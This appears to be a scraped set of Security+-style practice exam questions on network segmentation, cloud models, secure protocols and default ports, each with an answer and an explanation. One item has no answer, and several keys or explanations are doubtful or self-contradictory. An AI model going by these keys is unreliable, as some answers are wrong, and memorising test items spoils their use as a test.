Answer: A Explanation: A demilitarized zone (DMZ) is an area of a network that is designed specifically for public users to access. The DMZ is a buffer network between the public untrusted Internet and the private trusted LAN. Often a DMZ is deployed through the use of a multihomed firewall. |
|
|
Which of the following would allow the organization to divide a Class C IP address range into several ranges? A. DMZ B. Virtual LANs C. NAT D. Subnetting |
Answer: D Explanation: Subnetting is a dividing process used on networks to divide larger groups of hosts into smaller collections. |
|
|
Which of the following IP addresses would be hosts on the same subnet given the subnet mask255.255.255.224? (Select TWO). A. 10.4.4.125 B. 10.4.4.158 C. 10.4.4.165 D. 10.4.4.189 E. 10.4.4.199 |
Answer: C,D Explanation: With the given subnet mask, a maximum number of 30 hosts between IP addresses 10.4.4.161and 10.4.4.190 are allowed. Therefore, option C and D would be hosts on the same subnet, andthe other options would not. References:http://www.subnetonline.com/pages/subnet-calculators/ip-subnet-calculator.php |
|
|
Which of the following would the security engineer set as the subnet mask for the servers below to utilize host addresses on separate broadcast domains? Server 1: 192.168.100.6 Server 2: 192.168.100.9 Server 3: 192.169.100.20 A. /24 B. /27 C. /28 D. /29 E. /30 |
Answer: D Explanation: Using this option will result in all three servers using host addresses on different broadcastdomains. |
|
|
Which of the following is BEST used to break a group of IP addresses into smaller network segments or blocks? A. NAT B. Virtualization C. NAC D. Subnetting |
Answer: D Explanation: Subnetting is a dividing process used on networks to divide larger groups of hosts into smaller collections. |
|
|
A small company can only afford to buy an all-in-one wireless router/switch. The company has 3 wireless BYOD users and 2 web servers without wireless access. Which of the following shouldthe company configure to protect the servers from the user devices? (Select TWO). A. Deny incoming connections to the outside router interface. B. Change the default HTTP port C. Implement EAP-TLS to establish mutual authentication D. Disable the physical switch ports E. Create a server VLAN F. Create an ACL to access the server |
Answer: E,F Explanation: We can protect the servers from the user devices by separating them into separate VLANs (virtual local area networks).The network device in the question is a router/switch. We can use the router to allow access from devices in one VLAN to the servers in the other VLAN. We can configure an ACL (Access Control List) on the router to determine who is able to access the server.In computer networking, a single layer-2 network may be partitioned to create multiple distinct broadcast domains, which are mutually isolated so that packets can only pass between them viaone or more routers; such a domain is referred to as a virtual local area network, virtual LAN or VLAN.This is usually achieved on switch or router devices. Simpler devices only support partitioning on a port level (if at all), so sharing VLANs across devices requires running dedicated cabling for each VLAN. More sophisticated devices can mark packets through tagging, so that a single interconnect(trunk) may be used to transport data for multiple VLANs. Grouping hosts with a common set of requirements regardless of their physical location by VLAN can greatly simplify network design. A VLAN has the same attributes as a physical local area network (LAN), but it allows for end stations to be grouped together more easily even if they are not on the same network switch. The network described in this question is a DMZ, not a VLAN. |
|
|
A network engineer is setting up a network for a company. There is a BYOD policy for theemployees so that they can connect their laptops and mobile devices.Which of the following technologies should be employed to separate the administrative networkfrom the network in which all of the employees’ devices are connected? A. VPN B. VLAN C. WPA2 D. MAC filtering |
Answer: B Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. VLANs are used for traffic management. Communications between ports within the same VLAN occur without hindrance, but communications between VLANs require a routing function. |
|
|
Pete, a network administrator, is capturing packets on the network and notices that a large amount of the traffic on the LAN is SIP and RTP protocols. Which of the following should he do to segment that traffic from the other traffic? A. Connect the WAP to a different switch. B. Create a voice VLAN. C. Create a DMZ. D. Set the switch ports to 802.1q mode. |
Answer: B Explanation: It is a common and recommended practice to separate voice and data traffic by using VLANs.Separating voice and data traffic using VLANs provides a solid security boundary, preventing dataapplications from reaching the voice traffic. It also gives you a simpler method to deploy QoS,prioritizing the voice traffic over the data. |
|
|
An administrator connects VoIP phones to the same switch as the network PCs and printers.Which of the following would provide the BEST logical separation of these three device types whilestill allowing traffic between them via ACL? A. Create three VLANs on the switch connected to a router B. Define three subnets, configure each device to use their own dedicated IP address range, andthen connect the network to a router C. Install a firewall and connect it to the switch D. Install a firewall and connect it to a dedicated switch for each device type |
Answer: A Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. VLANs are used for traffic management. Communications between ports within thesame VLAN occur without hindrance, but communications between VLANs require a routing function. |
|
|
An administrator needs to segment internal traffic between layer 2 devices within the LAN. Whichof the following types of network design elements would MOST likely be used? A. Routing B. DMZ C. VLAN D. NAT |
Answer: C Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. VLANs are used for traffic management. Communications between ports within the same VLAN occur without hindrance, but communications between VLANs require a routing function. |
|
|
Pete, a security administrator, is informed that people from the HR department should not haveaccess to the accounting department’s server, and the accounting department should not haveaccess to the HR department’s server. The network is separated by switches. Which of thefollowing is designed to keep the HR department users from accessing the accountingdepartment’s server and vice-versa? A. ACLs B. VLANs C. DMZs D. NATS |
Answer: B Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. VLANs are used for traffic management. Communications between ports within the same VLAN occur without hindrance, but communications between VLANs require a routing function. |
|
|
According to company policy an administrator must logically keep the Human Resourcesdepartment separated from the Accounting department. Which of the following would be thesimplest way to accomplish this? A. NIDS B. DMZ C. NAT D. VLAN |
Answer: D Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. |
|
|
Review the following diagram depicting communication between PC1 and PC2 on each side of arouter. Analyze the network traffic logs which show communication between the two computers ascaptured by the computer with IP 10.2.2.10.DIAGRAMPC1 PC2[192.168.1.30]--------[INSIDE 192.168.1.1 router OUTSIDE 10.2.2.1]---------[10.2.2.10] LOGS10:30:22, SRC 10.2.2.1:3030, DST 10.2.2.10:80, SYN10:30:23, SRC 10.2.2.10:80, DST 10.2.2.1:3030, SYN/ACK10:30:24, SRC 10.2.2.1:3030, DST 10.2.2.10:80, ACK Given the above information, which of the following can be inferred about the above environment? A. 192.168.1.30 is a web server. B. The web server listens on a non-standard port. C. The router filters port 80 traffic. D. The router implements NAT. |
Answer: D Explanation: Network address translation (NAT) allows you to share a connection to the public Internet via a single interface with a single public IP address. NAT maps the private addresses to the public address. In a typical configuration, a local network uses one of the designated "private" IP address subnets. A router on that network has a private address (192.168.1.1) in that address space, and is also connected to the Internet with a "public" address (10.2.2.1) assigned by an Internet serviceprovider. |
|
|
An administrator wishes to hide the network addresses of an internal network when connecting tothe Internet. The MOST effective way to mask the network address of the users would be bypassing the traffic through a: A. stateful firewall B. packet-filtering firewall C. NIPS D. NAT |
Answer: D Explanation: NAT serves as a basic firewall by only allowing incoming traffic that is in response to an internal system’s request. |
|
|
A security analyst is reviewing firewall logs while investigating a compromised web server. The following ports appear in the log:22, 25, 445, 1433, 3128, 3389, 6667 Which of the following protocols was used to access the server remotely? A. LDAP B. HTTP C. RDP D. HTTPS |
Answer: C Explanation: RDP uses TCP port 3389 |
|
|
Which of the following is a programming interface that allows a remote computer to run programson a local machine? A. RPC B. RSH C. SSH D. SSL |
Answer: A Explanation: Remote Procedure Call (RPC) is a programming interface that allows a remote computer to run programs on a local machine. |
|
|
Which of the following would Pete, a security administrator, MOST likely implement in order to allow employees to have secure remote access to certain internal network services such as fileservers? A. Packet filtering firewall B. VPN gateway C. Switch D. Router |
Answer: B Explanation: VPNs are usually employed to allow remote access users to connect to and access the network,and offer connectivity between two or more private networks or LANs. A VPN gateway (VPN router) is a connection point that connects two LANs via a nonsecure network such as the Internet. |
|
|
Which of the following should be performed to increase the availability of IP telephony byprioritizing traffic? A. Subnetting B. NAT C. Quality of service D. NAC |
Answer: C Explanation: Quality of Service (QoS) facilitates the deployment of media-rich applications, such as videoconferencing and Internet Protocol (IP) telephony, without adversely affecting network throughput. |
|
|
An auditor is given access to a conference room to conduct an analysis. When they connect theirlaptop’s Ethernet cable into the wall jack, they are not able to get a connection to the Internet but have a link light. Which of the following is MOST likely causing this issue? A. Ethernet cable is damaged B. The host firewall is set to disallow outbound connections C. Network Access Control D. The switch port is administratively shutdown |
Answer: C Explanation: Network Access Control (NAC) means controlling access to an environment through strict adherence to and implementation of security policies. The goals of NAC are to prevent/reduce zero-day attacks, enforce security policy throughout the network, and use identities to perform access control. |
|
|
A computer is put into a restricted VLAN until the computer’s virus definitions are up-to-date.Which of the following BEST describes this system type? A. NAT B. NIPS C. NAC D. DMZ |
Answer: C Explanation: Network Access Control (NAC) means controlling access to an environment through strict adherence to and implementation of security policies. The goals of NAC are to prevent/reduce zero-day attacks, enforce security policy throughout the network, and use identities to perform access control. |
|
|
Which of the following is required to allow multiple servers to exist on one physical server?A. Software as a Service (SaaS) B. Platform as a Service (PaaS) C. Virtualization D. Infrastructure as a Service (IaaS) |
Answer: C Explanation: Virtualization allows a single set of hardware to host multiple virtual machines. |
|
|
A corporation is looking to expand their data center but has run out of physical space in which tostore hardware. Which of the following would offer the ability to expand while keeping their currentdata center operated by internal staff? A. Virtualization B. Subnetting C. IaaS D. SaaS |
Answer: A Explanation: Virtualization allows a single set of hardware to host multiple virtual machines. |
|
|
The server administrator has noted that most servers have a lot of free disk space and lowmemory utilization. Which of the following statements will be correct if the server administrator migrates to a virtual server environment? A. The administrator will need to deploy load balancing and clustering. B. The administrator may spend more on licensing but less on hardware and equipment. C. The administrator will not be able to add a test virtual environment in the data center. D. Servers will encounter latency and lowered throughput issues. |
update question, answer missing |
|
|
Due to limited resources, a company must reduce their hardware budget while still maintainingavailability. Which of the following would MOST likely help them achieve their objectives? A. Virtualization B. Remote access C. Network access control D. Blade servers |
Answer: A Explanation: Because Virtualization allows a single set of hardware to host multiple virtual machines, it requires less hardware to maintain the current scenario. |
|
|
Pete, a security engineer, is trying to inventory all servers in a rack. The engineer launches RDP sessions to five different PCs and notices that the hardware properties are similar. Additionally, the MAC addresses of all five servers appear on the same switch port. Which of the following is MOST likely the cause? A. The system is running 802.1x. B. The system is using NAC. C. The system is in active-standby mode. D. The system is virtualized. |
Answer: D Explanation: Virtualization allows a single set of hardware to host multiple virtual machines. |
|
|
Which of the following offers the LEAST amount of protection against data theft by USB drives? A. DLP B. Database encryption C. TPM D. Cloud computing |
Answer: D Explanation: Cloud computing refers to performing data processing and storage elsewhere, over a networkconnection, rather than locally. Because users have access to the data, it can easily be copied toa USB device. |
|
|
A company’s business model was changed to provide more web presence and now its ERMsoftware is no longer able to support the security needs of the company. The current data centerwill continue to provide network and security services. Which of the following network elementswould be used to support the new business model?A. Software as a ServiceB. DMZC. Remote access supportD. Infrastructure as a Service |
Answer: AExplanation: Software as a Service (SaaS) allows for on-demand online access to specific softwareapplications or suites without having to install it locally. This will allow the data center to continueproviding network and security services. |
|
|
The Chief Information Officer (CIO) has mandated web based Customer RelationshipManagement (CRM) business functions be moved offshore to reduce cost, reduce IT overheads,and improve availability. The Chief Risk Officer (CRO) has agreed with the CIO’s direction but hasmandated that key authentication systems be run within the organization’s network. Which of thefollowing would BEST meet the CIO and CRO’s requirements?A. Software as a ServiceB. Infrastructure as a ServiceC. Platform as a ServiceD. Hosted virtualization service |
Answer: AExplanation: Software as a Service (SaaS) is a software distribution model in which applications are hosted bya vendor or service provider and made available to customers over a network, typically theInternet. |
|
|
An IT director is looking to reduce the footprint of their company’s server environment. They havedecided to move several internally developed software applications to an alternate environment,supported by an external company. Which of the following BEST describes this arrangement?A. Infrastructure as a ServiceB. Storage as a ServiceC. Platform as a ServiceD. Software as a Service |
Answer: AExplanation: Cloud users install operating-system images and their application software on the cloudinfrastructure to deploy their applications. In this model, the cloud user patches and maintains theoperating systems and the application software. |
|
|
Which of the following offerings typically allows the customer to apply operating system patches?A. Software as a serviceB. Public CloudsC. Cloud Based StorageD. Infrastructure as a service |
Answer: DExplanation: Cloud users install operating-system images and their application software on the cloudinfrastructure to deploy their applications. In this model, the cloud user patches and maintains theoperating systems and the application software. |
|
|
Which of the following technologies can store multi-tenant data with different securityrequirements? A. Data loss preventionB. Trusted platform moduleC. Hard drive encryptionD. Cloud computing |
Answer: DExplanation: One of the ways cloud computing is able to obtain cost efficiencies is by putting data from variousclients on the same machines. This “multitenant” nature means that workloads from differentclients can be on the same system, and a flaw in implementation could compromise security. |
|
|
Multi-tenancy is a concept found in which of the following?A. Full disk encryptionB. Removable mediaC. Cloud computingD. Data loss prevention |
Answer: CExplanation: One of the ways cloud computing is able to obtain cost efficiencies is by putting data from variousclients on the same machines. This “multitenant” nature means that workloads from differentclients can be on the same system, and a flaw in implementation could compromise security. |
|
|
Which of the following devices is BEST suited to protect an HTTP-based application that issusceptible to injection attacks?A. Protocol filterB. Load balancerC. NIDSD. Layer 7 firewall |
Answer: DExplanation: An application-level gateway firewall filters traffic based on user access, group membership, theapplication or service used, or even the type of resources being transmitted. This type of firewall operates at the Application layer (Layer 7) of the OSI model. |
|
|
QUESTION NO: 95 Concurrent use of a firewall, content filtering, antivirus software and an IDS system would beconsidered components of:A. Redundant systems.B. Separation of duties.C. Layered security.D. Application control. |
Answer: CExplanation: Layered security is the practice of combining multiple mitigating security controls to protectresources and data |
|
|
A network engineer is designing a secure tunneled VPN. Which of the following protocols wouldbe the MOST secure?A. IPsecB. SFTPC. BGPD. PPTP |
Answer: AExplanation: Layer 2 Tunneling Protocol (L2TP) came about through a partnership between Cisco andMicrosoft with the intention of providing a more secure VPN protocol. L2TP is considered to be amore secure option than PPTP, as the IPSec protocol which holds more secure encryptionalgorithms, is utilized in conjunction with it. It also requires a pre-shared certificate or key. L2TP’sstrongest level of encryption makes use of 168 bit keys, 3 DES encryption algorithm and requirestwo levels of authentication.L2TP has a number of advantages in comparison to PPTP in terms of providing data integrity andauthentication of origin verification designed to keep hackers from compromising the system.However, the increased overhead required to manage this elevated security means that itperforms at a slower pace than PPTP. |
|
|
Configuring the mode, encryption methods, and security associations are part of which of thefollowing?A. IPSecB. Full disk encryptionC. 802.1xD. PKI |
Answer: AExplanation: IPSec can operate in tunnel mode or transport mode. It uses symmetric cryptography to provideencryption security. Furthermore, it makes use of Internet Security Association and KeyManagement Protocol (ISAKMP). |
|
|
A company’s legacy server requires administration using Telnet. Which of the following protocolscould be used to secure communication by offering encryption at a lower OSI layer? (SelectTWO).A. IPv6B. SFTPC. IPSecD. SSHE. IPv4 |
Answer: A,CExplanation: Telnet supports IPv6 connections.IPv6 is the communications protocol that provides an identification and location system forcomputers on networks and routes traffic across the Internet. IPsec is a protocol suite for securingInternet Protocol (IP) communications by authenticating and encrypting each IP packet of acommunication session. IPsec is a compulsory component for IPv6.IPsec operates at Layer 3 of the OSI model, whereas Telnet operates at Layer 7. |
|
|
A network administrator needs to provide daily network usage reports on all layer 3 deviceswithout compromising any data while gathering the information. Which of the following would beconfigured to provide these reports?A. SNMPB. SNMPv3C. ICMPD. SSH |
Answer: BExplanation: Currently, SNMP is predominantly used for monitoring and performance management. SNMPv3defines a secure version of SNMP and also facilitates remote configuration of the SNMP entities. |
|
|
Matt, a security administrator, wants to configure all the switches and routers in the network inorder to securely monitor their status. Which of the following protocols would he need to configureon each device?A. SMTPB. SNMPv3C. IPSecD. SNMP |
Answer: BExplanation: Currently, SNMP is predominantly used for monitoring and performancemanagement. SNMPv3 defines a secure version of SNMP and also facilitates remoteconfiguration of the SNMP entities. |
|
|
A recent vulnerability scan found that Telnet is enabled on all network devices. Which of thefollowing protocols should be used instead of Telnet?A. SCP B. SSHC. SFTPD. SSL |
Answer: BExplanation: SSH transmits both authentication traffic and data in a secured encrypted form, whereas Telnettransmits both authentication credentials and data in clear text. |
|
|
Which of the following is BEST used as a secure replacement for TELNET?A. HTTPSB. HMACC. GPGD. SSH |
Answer: DExplanation: SSH transmits both authentication traffic and data in a secured encrypted form, whereas Telnettransmits both authentication credentials and data in clear text. |
|
|
A security analyst needs to logon to the console to perform maintenance on a remote server.Which of the following protocols would provide secure access?A. SCPB. SSHC. SFTPD. HTTPS |
Answer: BExplanation: Secure Shell (SSH) is a tunneling protocol originally used on Unix systems. It’s now available forboth Unix and Windows environments. SSH is primarily intended for interactive terminal sessions.SSH is used to establish a command-line, text-only interface connection with a server, router,switch, or similar device over any distance. |
|
|
A UNIX administrator would like to use native commands to provide a secure way of connecting toother devices remotely and to securely transfer files. Which of the following protocols could beutilized? (Select TWO).A. RDPB. SNMPC. FTPD. SCPE. SSH |
Answer: D,EExplanation: SSH is used to establish a command-line, text-only interface connection with a server, router,switch, or similar device over any distance.Secure Copy Protocol (SCP) is a secure file-transfer facility based on SSH and Remote CopyProtocol (RCP). SCP is commonly used on Linux and Unix platforms. |
|
|
A network technician is on the phone with the system administration team. Power to the serverroom was lost and servers need to be restarted. The DNS services must be the first to berestarted. Several machines are powered off. Assuming each server only provides one service,which of the following should be powered on FIRST to establish DNS services?A. Bind serverB. Apache serverC. Exchange serverD. RADIUS server |
Answer: AExplanation: BIND (Berkeley Internet Name Domain) is the most widely used Domain Name System (DNS)software on the Internet. It includes the DNS server component contracted for name daemon. Thisis the only option that directly involves DNS. |
|
|
When reviewing security logs, an administrator sees requests for the AAAA record ofwww.comptia.com. Which of the following BEST describes this type of record?A. DNSSEC recordB. IPv4 DNS recordC. IPSEC DNS recordD. IPv6 DNS record |
Answer: DExplanation: The AAAA Address record links a FQDN to an IPv6 address. |
|
|
Which of the following should be implemented to stop an attacker from mapping out addressesand/or devices on a network?A. Single sign onB. IPv6C. Secure zone transfersD. VoIP |
Answer: CExplanation: C: A primary DNS server has the "master copy" of a zone, and secondary DNS servers keepcopies of the zone for redundancy. When changes are made to zone data on the primary DNSserver, these changes must be distributed to the secondary DNS servers for the zone. This isdone through zone transfers. If you allow zone transfers to any server, all the resource records inthe zone are viewable by any host that can contact your DNS server. Thus you will need to securethe zone transfers to stop an attacker from mapping out your addresses and devices on yournetwork. |
|
|
A security engineer, Joe, has been asked to create a secure connection between his mail serverand the mail server of a business partner. Which of the following protocol would be MOSTappropriate?A. HTTPS B. SSHC. FTPD. TLS |
Answer: DExplanation: Transport Layer Security (TLS) is a cryptographic protocol designed to providecommunications security over a computer network. It uses X.509 certificates and henceasymmetric cryptography to authenticate the counterparty with whom it is communicating, and toexchange a symmetric key. The TLS protocol allows client-server applications to communicateacross a network in a way designed to prevent eavesdropping and tampering. |
|
|
Which of the following protocols is used to authenticate the client and server’s digital certificate?A. PEAPB. DNSC. TLSD. ICMP |
Answer: CExplanation: Transport Layer Security (TLS) is a cryptographic protocol designed to provide communicationssecurity over a computer network. It uses X.509 certificates and hence asymmetric cryptographyto authenticate the counterparty with whom it is communicating, and to exchange a symmetric key. |
|
|
An administrator configures all wireless access points to make use of a new network certificateauthority. Which of the following is being used?A. WEPB. LEAPC. EAP-TLSD. TKIP |
Answer: CExplanation: The majority of the EAP-TLS implementations require client-side X.509 certificates without givingthe option to disable the requirement. |
|
|
An achievement in providing worldwide Internet security was the signing of certificates associatedwith which of the following protocols?A. TCP/IPB. SSLC. SCPD. SSH |
Answer: BExplanation: SSL (Secure Sockets Layer) is used for establishing an encrypted link between two computers,typically a web server and a browser. SSL is used to enable sensitive information such as logincredentials and credit card numbers to be transmitted securely. |
|
|
Which of the following is the MOST secure protocol to transfer files?A. FTPB. FTPSC. SSHD. TELNET |
Answer: BExplanation: FTPS refers to FTP Secure, or FTP SSL. It is a secure variation of File Transfer Protocol (FTP). |
|
|
FTP/S uses which of the following TCP ports by default?A. 20 and 21B. 139 and 445C. 443 and 22D. 989 and 990 |
Answer: DExplanation: FTPS uses ports 989 and 990 |
|
|
Which of the following protocols allows for secure transfer of files? (Select TWO).A. ICMPB. SNMPC. SFTPD. SCPE. TFTP |
Answer: C,DExplanation: Standard FTP is a protocol often used to move files between one system and another either overthe Internet or within private networks. SFTP is a secured alternative to standard FTP.Secure Copy Protocol (SCP) is a secure file-transfer facility based on SSH and Remote CopyProtocol (RCP). |
|
|
After a network outage, a PC technician is unable to ping various network devices. The networkadministrator verifies that those devices are working properly and can be accessed securely.Which of the following is the MOST likely reason the PC technician is unable to ping thosedevices?A. ICMP is being blockedB. SSH is not enabledC. DNS settings are wrongD. SNMP is not configured properly |
Answer: AExplanation: ICMP is a protocol that is commonly used by tools such as ping, traceroute, and pathping. ICMPoffers no information If ICMP request queries go unanswered, or ICMP replies are lost or blocked. |
|
|
A security administrator wishes to change their wireless network so that IPSec is built into theprotocol and NAT is no longer required for address range extension. Which of the followingprotocols should be used in this scenario?A. WPA2B. WPAC. IPv6D. IPv4 |
Answer: CExplanation: IPSec security is built into IPv6. |
|
|
A system administrator attempts to ping a hostname and the response is 2001:4860:0:2001::68.Which of the following replies has the administrator received?A. The loopback addressB. The local MAC addressC. IPv4 addressD. IPv6 address |
Answer: DExplanation: IPv6 addresses are 128-bits in length. An IPv6 address is represented as eight groups of fourhexadecimal digits, each group representing 16 bits (two octets). The groups are separated bycolons (:). The hexadecimal digits are case-insensitive, but IETF recommendations suggest theuse of lower case letters. The full representation of eight 4-digit groups may be simplified byseveral techniques, eliminating parts of the representation. |
|
|
Which of the following protocols is used by IPv6 for MAC address resolution?A. NDP B. ARPC. DNSD. NCP |
Answer: AExplanation: The Neighbor Discovery Protocol (NDP) is a protocol in the Internet protocol suite used withInternet Protocol Version 6 (IPv6). |
|
|
Which of the following protocols allows for the LARGEST address space?A. IPXB. IPv4C. IPv6D. Appletalk |
Answer: CExplanation: The main advantage of IPv6 over IPv4 is its larger address space. The length of an IPv6 addressis 128 bits, compared with 32 bits in IPv4. |
|
|
Pete, a network administrator, is implementing IPv6 in the DMZ. Which of the following protocolsmust he allow through the firewall to ensure the web servers can be reached via IPv6 from an IPv6enabled Internet host?A. TCP port 443 and IP protocol 46B. TCP port 80 and TCP port 443C. TCP port 80 and ICMPD. TCP port 443 and SNMP |
Answer: BExplanation: HTTP and HTTPS, which uses TCP port 80 and TCP port 443 respectively, is necessary forCommunicating with Web servers. It should therefore be allowed through the firewall. |
|
|
Which of the following ports and protocol types must be opened on a host with a host-basedfirewall to allow incoming SFTP connections?A. 21/UDPB. 21/TCPC. 22/UDPD. 22/TCP |
Answer: DExplanation: SSH uses TCP port 22. All protocols encrypted by SSH, including SFTP, SHTTP, SCP, SExec,and slogin, also use TCP port 22 |
|
|
A network administrator is asked to send a large file containing PII to a business associate.Which of the following protocols is the BEST choice to use?A. SSHB. SFTPC. SMTPD. FTP |
Answer: BExplanation: SFTP encrypts authentication and data traffic between the client and server by making use of SSHto provide secure FTP communications. As a result, SFTP offers protection for both theauthentication traffic and the data transfer taking place between a client and server. |
|
|
Which of the following is a difference between TFTP and FTP?A. TFTP is slower than FTP.B. TFTP is more secure than FTP.C. TFTP utilizes TCP and FTP uses UDP.D. TFTP utilizes UDP and FTP uses TCP |
Answer: DExplanation: FTP employs TCP ports 20 and 21 to establish and maintain client-to-server communications,whereas TFTP makes use of UDP port 69 |
|
|
Which of the following is the default port for TFTP?A. 20B. 69C. 21D. 68 |
Answer: BExplanation: TFTP makes use of UDP port 69. |
|
|
A network consists of various remote sites that connect back to two main locations. Pete, thesecurity administrator, needs to block TELNET access into the network. Which of the following, bydefault, would be the BEST choice to accomplish this goal?A. Block port 23 on the L2 switch at each remote siteB. Block port 23 on the network firewallC. Block port 25 on the L2 switch at each remote siteD. Block port 25 on the network firewall |
Answer: BExplanation: Telnet is a terminal-emulation network application that supports remote connectivity for executingcommands and running applications but doesn’t support transfer of fi les. Telnet uses TCP port 23.Because it’s a clear text protocol and service, it should be avoided and replaced with SSH. |
|
|
A security analyst noticed a colleague typing the following command:`Telnet some-host 443’Which of the following was the colleague performing?A. A hacking attempt to the some-host web server with the purpose of achieving a distributeddenial of service attack.B. A quick test to see if there is a service running on some-host TCP/443, which is being routedcorrectly and not blocked by a firewall.C. Trying to establish an insecure remote management session. The colleague should be usingSSH or terminal services instead.D. A mistaken port being entered because telnet servers typically do not listen on port 443. |
Answer: BExplanation: B: The Telnet program parameters are: telnet is the name or IP address of the remote server to connect to. is the port number of the service to use for the connection.TCP port 443 provides the HTTPS (used for secure web connections) service; it is the default SSLport. By running the Telnet some-host 443 command, the security analyst is checking that routingis done properly and not blocked by a firewall. |
|
|
A malicious program modified entries in the LMHOSTS file of an infected system. Which of thefollowing protocols would have been affected by this?A. ICMPB. BGPC. NetBIOSD. DNS |
Answer: CExplanation: The LMHOSTS file provides a NetBIOS name resolution method that can be used for smallnetworks that do not use a WINS server. NetBIOS has been adapted to run on top of TCP/IP, andis still extensively used for name resolution and registration in Windows-based environments. |
|
|
An information bank has been established to store contacts, phone numbers and other records. AUNIX application needs to connect to the index server using port 389. Which of the followingauthentication services should be used on this port by default?A. RADIUSB. KerberosC. TACACS+D. LDAP |
Answer: DExplanation: LDAP makes use of port 389. |
|
|
A firewall technician has been instructed to disable all non-secure ports on a corporate firewall.The technician has blocked traffic on port 21, 69, 80, and 137-139. The technician has allowedtraffic on ports 22 and 443. Which of the following correctly lists the protocols blocked andallowed?A. Blocked: TFTP, HTTP, NetBIOS; Allowed: HTTPS, FTPB. Blocked: FTP, TFTP, HTTP, NetBIOS; Allowed: SFTP, SSH, SCP, HTTPSC. Blocked: SFTP, TFTP, HTTP, NetBIOS; Allowed: SSH, SCP, HTTPSD. Blocked: FTP, HTTP, HTTPS; Allowed: SFTP, SSH, SCP, NetBIOS |
Answer: BExplanation: The question states that traffic on port 21, 69, 80, and 137-139 is blocked, while ports 22 and 443are allowed. Port 21 is used for FTP by default.Port 69 is used for TFTP.Port 80 is used for HTTP.Ports 137-139 are used for NetBIOS.VMM uses SFTP over default port 22.Port 22 is used for SSH by default.SCP runs over TCP port 22 by default.Port 443 is used for HTTPS. |
|
|
A company has implemented PPTP as a VPN solution. Which of the following ports would need tobe opened on the firewall in order for this VPN to function properly? (Select TWO). A. UDP 1723 B. TCP 500 C. TCP 1723 D. UDP 47 E. TCP 47 |
Answer: C,D Explanation: A PPTP tunnel is instantiated by communication to the peer on TCP port 1723. This TCPconnection is then used to initiate and manage a second GRE tunnel to the same peer. The PPTPGRE packet format is non-standard, including an additional acknowledgement field replacing thetypical routing field in the GRE header. However, as in a normal GRE connection, those modifiedGRE packets are directly encapsulated into IP packets, and seen as IP protocol number 47 |
|
|
After a new firewall has been installed, devices cannot obtain a new IP address. Which of thefollowing ports should Matt, the security administrator, open on the firewall?A. 25B. 68C. 80D. 443 |
Answer: BExplanation: The Dynamic Host Configuration Protocol (DHCP) is a standardized network protocol used onInternet Protocol (IP) networks for distributing IP addresses for interfaces and services. DHCPmakes use of port 68. |
|
|
A security administrator has configured FTP in passive mode. Which of the following ports shouldthe security administrator allow on the firewall by default?A. 20B. 21C. 22D. 23 |
Answer: BExplanation: When establishing an FTP session, clients start a connection to an FTP server that listens on TCPport 21 by default. |
|
|
Which of the following ports is used for SSH, by default?A. 23B. 32C. 12D. 22 |
Answer: DExplanation: Secure Shell (SSH) is a cryptographic network protocol for securing data communication. Itestablishes a secure channel over an insecure network in a client-server architecture, connectingan SSH client application with an SSH server. Common applications include remote command-linelogin, remote command execution, but any network service can be secured with SSH. SSH usesport 22. |
|
|
By default, which of the following uses TCP port 22? (Select THREE).A. FTPSB. STELNETC. TLSD. SCPE. SSLF. HTTPSG. SSHH. SFTP |
Answer: D,G,HExplanation: G: Secure Shell (SSH) is a cryptographic network protocol for securing data communication. Itestablishes a secure channel over an insecure network in a client-server architecture, connectingan SSH client application with an SSH server. Common applications include remote command-linelogin, remote command execution, but any network service can be secured with SSH. SSH usesport 22.D: SCP stands for Secure Copy. SCP is used to securely copy files over a network. SCP usesSSH to secure the connection and therefore uses port 22.H: SFTP stands for stands for Secure File Transfer Protocol and is used for transferring files usingFTP over a secure network connection. SFTP uses SSH to secure the connection and thereforeuses port 22. |
|
|
Pete needs to open ports on the firewall to allow for secure transmission of files. Which of thefollowing ports should be opened on the firewall?A. TCP 23B. UDP 69C. TCP 22D. TCP 21 |
Answer: CExplanation: SSH uses TCP port 22. All protocols encrypted by SSH, including SFTP, SHTTP, SCP, SExec,and slogin, also use TCP port 22. Secure Copy Protocol (SCP) is a secure file-transfer facilitybased on SSH and Remote Copy Protocol (RCP). Secure FTP (SFTP) is a secured alternative tostandard File Transfer Protocol (FTP). |
|
|
Which of the following uses port 22 by default? (Select THREE).A. SSHB. SSLC. TLSD. SFTPE. SCPF. FTPSG. SMTPH. SNMP |
Answer: A,D,EExplanation: SSH uses TCP port 22. All protocols encrypted by SSH, including SFTP, SHTTP, SCP, SExec,and slogin, also use TCP port 22. |
|
|
Which of the following ports should be used by a system administrator to securely manage aremote server?A. 22B. 69C. 137D. 445 |
Answer: AExplanation: Secure Shell (SSH) is a more secure replacement for Telnet, rlogon, rsh, and rcp. SSH can becalled a remote access or remote terminal solution. SSH offers a means by which a commandline, text-only interface connection with a server, router, switch, or similar device can beestablished over any distance. SSH makes use of TCP port 22. |
|
|
Which of the following ports is used to securely transfer files between remote UNIX systems? A. 21B. 22C. 69D. 445 |
Answer: BExplanation: SCP copies files securely between hosts on a network. It uses SSH for data transfer, and uses thesame authentication and provides the same security as SSH. Unlike RCP, SCP will ask forpasswords or passphrases if they are needed for authentication.SSH uses TCP port 22. All protocols encrypted by SSH, including SFTP, SHTTP, SCP, SExec,and slogin, also use TCP port 22 |
|
|
Which of the following secure file transfer methods uses port 22 by default?A. FTPSB. SFTPC. SSLD. S/MIME |
Answer: BExplanation: SSH uses TCP port 22. All protocols encrypted by SSH, including SFTP, SHTTP, SCP, SExec,and slogin, also use TCP port 22. |
|
|
During the analysis of a PCAP file, a security analyst noticed several communications with aremote server on port 53. Which of the following protocol types is observed in this traffic?A. FTPB. DNSC. EmailD. NetBIOS |
Answer: BExplanation: DNS (Domain Name System) uses port 53 |
|
|
A security technician needs to open ports on a firewall to allow for domain name resolution.Which of the following ports should be opened? (Select TWO). A. TCP 21 B. TCP 23 C. TCP 53 D. UDP 23 E. UDP 53 |
Answer: C,EExplanation: DNS uses TCP and UDP port 53. TCP port 53 is used for zone transfers, whereas UDP port 53 isused for queries |
|
|
